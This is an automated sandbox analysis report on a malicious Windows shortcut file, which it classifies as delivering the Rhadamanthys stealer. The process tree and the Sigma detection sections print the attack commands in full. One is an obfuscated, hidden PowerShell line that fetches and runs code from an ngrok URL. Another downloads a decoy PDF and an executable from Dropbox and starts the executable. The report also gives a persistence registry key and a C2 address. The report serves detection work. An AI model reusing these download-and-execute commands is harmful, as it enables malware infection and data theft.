Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
qxjDerXRGR.lnk

Overview

General Information

Sample name:qxjDerXRGR.lnk
renamed because original name is a hash value
Original sample name:72aecd00372e488060a53065258a0eb3b57cdd79db5b2afda0082ffe92ebc269.lnk
Analysis ID:1572661
MD5:c88f33a90353512ebf86cb42e9e1ed08
SHA1:a99182cf7c27dda2a192598210339eb96f0612a6
SHA256:72aecd00372e488060a53065258a0eb3b57cdd79db5b2afda0082ffe92ebc269
Tags:Compilazioneprotetticopyrightlnkuser-JAMESWT_MHT
Infos:

Detection

RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
Drops PE files to the document folder of the user
Drops large PE files
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Powerup Write Hijack DLL
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Detected suspicious crossdomain redirect
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 4296 cmdline: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing) MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5660 cmdline: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • msedge.exe (PID: 3560 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 616 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=2032,i,3747438541677274565,12230203629466347722,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • cmd.exe (PID: 1272 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\399226976.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8496 cmdline: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • msedge.exe (PID: 9040 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\1262855704.pdf MD5: 69222B8101B0601CC6663F8381E7E00F)
            • msedge.exe (PID: 9244 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=2092,i,15797820631052527623,15050807233246554643,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
          • 111392827.exe (PID: 9408 cmdline: "C:\Users\user\AppData\Local\Temp\111392827.exe" MD5: EB40135D3E0FE985A9E09970DC09A499)
            • 111392827.exe (PID: 9612 cmdline: "C:\Users\user\AppData\Local\Temp\111392827.exe" MD5: EB40135D3E0FE985A9E09970DC09A499)
              • fontdrvhost.exe (PID: 9640 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)
                • fontdrvhost.exe (PID: 9800 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
                  • WerFault.exe (PID: 9864 cmdline: C:\Windows\system32\WerFault.exe -u -p 9800 -s 144 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
              • WerFault.exe (PID: 9720 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 9612 -s 472 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 6596 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • msedge.exe (PID: 7208 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7552 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8300 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6552 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8376 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6924 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8876 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7468 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8952 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=8484 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:6 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 9964 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6860 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000018.00000003.2631329587.00000000007A0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
    00000019.00000003.2641153235.00000000030A0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
      00000018.00000003.2639140917.0000000002D80000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        00000019.00000002.2758285950.0000000003360000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
          00000018.00000003.2639519078.0000000002FA0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            25.3.fontdrvhost.exe.53e0000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              24.3.111392827.exe.2fa0000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                25.3.fontdrvhost.exe.5600000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  24.3.111392827.exe.2d80000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powerup Write Hijack DLL
                    Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5660, TargetFilename: C:\Users\user\AppData\Local\Temp\399226976.bat
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\111392827.exe, ProcessId: 9408, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PerfectouinVans
                    Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5660, TargetFilename: C:\Users\user\AppData\Local\Temp\399226976.bat
                    Sigma detected: PowerShell Web Download
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE", CommandLine: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\399226976.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1272, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE", ProcessId: 8496, ProcessName: powershell.exe
                    Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing), CommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4296, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing), ProcessId: 5660, ProcessName: powershell.exe
                    Sigma detected: Usage Of Web Request Commands And Cmdlets
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing), CommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing), CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing), ProcessId: 4296, ProcessName: cmd.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing), CommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4296, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing), ProcessId: 5660, ProcessName: powershell.exe
                    Sigma detected: Windows Processes Suspicious Parent Directory
                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6596, ProcessName: svchost.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-10T18:40:20.053674+010028032742Potentially Bad Traffic192.168.2.549709162.125.65.18443TCP
                    2024-12-10T18:40:35.468136+010028032742Potentially Bad Traffic192.168.2.549795162.125.65.18443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-10T18:41:06.598167+010028548021Domain Observed Used for C2 Detected162.213.210.2506499192.168.2.549891TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeReversingLabs: Detection: 26%
                    Multi AV Scanner detection for submitted file
                    Source: qxjDerXRGR.lnkReversingLabs: Detection: 21%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                    Machine Learning detection for sample
                    Source: qxjDerXRGR.lnkJoe Sandbox ML: detected
                    Source: unknownHTTPS traffic detected: 3.125.209.94:443 -> 192.168.2.5:49704 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.125.65.18:443 -> 192.168.2.5:49705 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.5:49706 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.125.65.15:443 -> 192.168.2.5:49712 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.125.65.18:443 -> 192.168.2.5:49739 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.5:49773 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.5:49811 version: TLS 1.2
                    Source: Binary string: wkernel32.pdb source: 111392827.exe, 00000018.00000003.2638528309.0000000002EA0000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2638367786.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2644916290.0000000005500000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2644772476.00000000053E0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernelbase.pdb source: 111392827.exe, 00000018.00000003.2639140917.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2639519078.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdb source: 111392827.exe, 00000018.00000003.2636412906.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2636644786.0000000002F70000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2643153256.00000000055D0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2642593564.00000000053E0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: 111392827.exe, 00000018.00000003.2637136208.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2637912190.0000000002F20000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2643951128.00000000053E0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: D:\winapps\gu6\exe\vc\DiskDefrag\sourcecode\Release_s\DiskDefrag.pdb`Il source: 111392827.exe, 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmp, 111392827.exe, 00000016.00000000.2449232884.000000000047C000.00000002.00000001.01000000.0000000F.sdmp, 111392827.exe, 00000016.00000002.2669074846.00000000026D0000.00000004.00001000.00020000.00000000.sdmp, 111392827.exe, 00000018.00000000.2620655010.000000000047C000.00000002.00000001.01000000.0000000F.sdmp
                    Source: Binary string: ntdll.pdbUGP source: 111392827.exe, 00000018.00000003.2636412906.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2636644786.0000000002F70000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2643153256.00000000055D0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2642593564.00000000053E0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: 111392827.exe, 00000018.00000003.2637136208.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2637912190.0000000002F20000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2643951128.00000000053E0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernel32.pdbUGP source: 111392827.exe, 00000018.00000003.2638528309.0000000002EA0000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2638367786.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2644916290.0000000005500000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2644772476.00000000053E0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernelbase.pdbUGP source: 111392827.exe, 00000018.00000003.2639140917.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2639519078.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: D:\winapps\gu6\exe\vc\DiskDefrag\sourcecode\Release_s\DiskDefrag.pdb source: 111392827.exe, 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmp, 111392827.exe, 00000016.00000000.2449232884.000000000047C000.00000002.00000001.01000000.0000000F.sdmp, 111392827.exe, 00000016.00000002.2669074846.00000000026D0000.00000004.00001000.00020000.00000000.sdmp, 111392827.exe, 00000018.00000000.2620655010.000000000047C000.00000002.00000001.01000000.0000000F.sdmp
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00411150 FindFirstFileW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,22_2_00411150
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_004631F0 FindFirstFileW,FindNextFileW,FindClose,22_2_004631F0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0045A7D0 GetDiskFreeSpaceExW,GetDiskFreeSpaceW,FindFirstFileW,FindClose,GetDiskFreeSpaceW,22_2_0045A7D0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00462F00 FindFirstFileW,FindClose,22_2_00462F00
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00411150 FindFirstFileW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,24_2_00411150
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_004631F0 FindFirstFileW,FindNextFileW,FindClose,24_2_004631F0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0045A7D0 GetDiskFreeSpaceExW,GetDiskFreeSpaceW,FindFirstFileW,FindClose,GetDiskFreeSpaceW,24_2_0045A7D0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00462F00 FindFirstFileW,FindClose,24_2_00462F00
                    Source: C:\Windows\System32\fontdrvhost.exeCode function: 4x nop then dec esp29_2_00000202B2F50511

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 162.213.210.250:6499 -> 192.168.2.5:49891
                    Source: global trafficTCP traffic: 192.168.2.5:49891 -> 162.213.210.250:6499
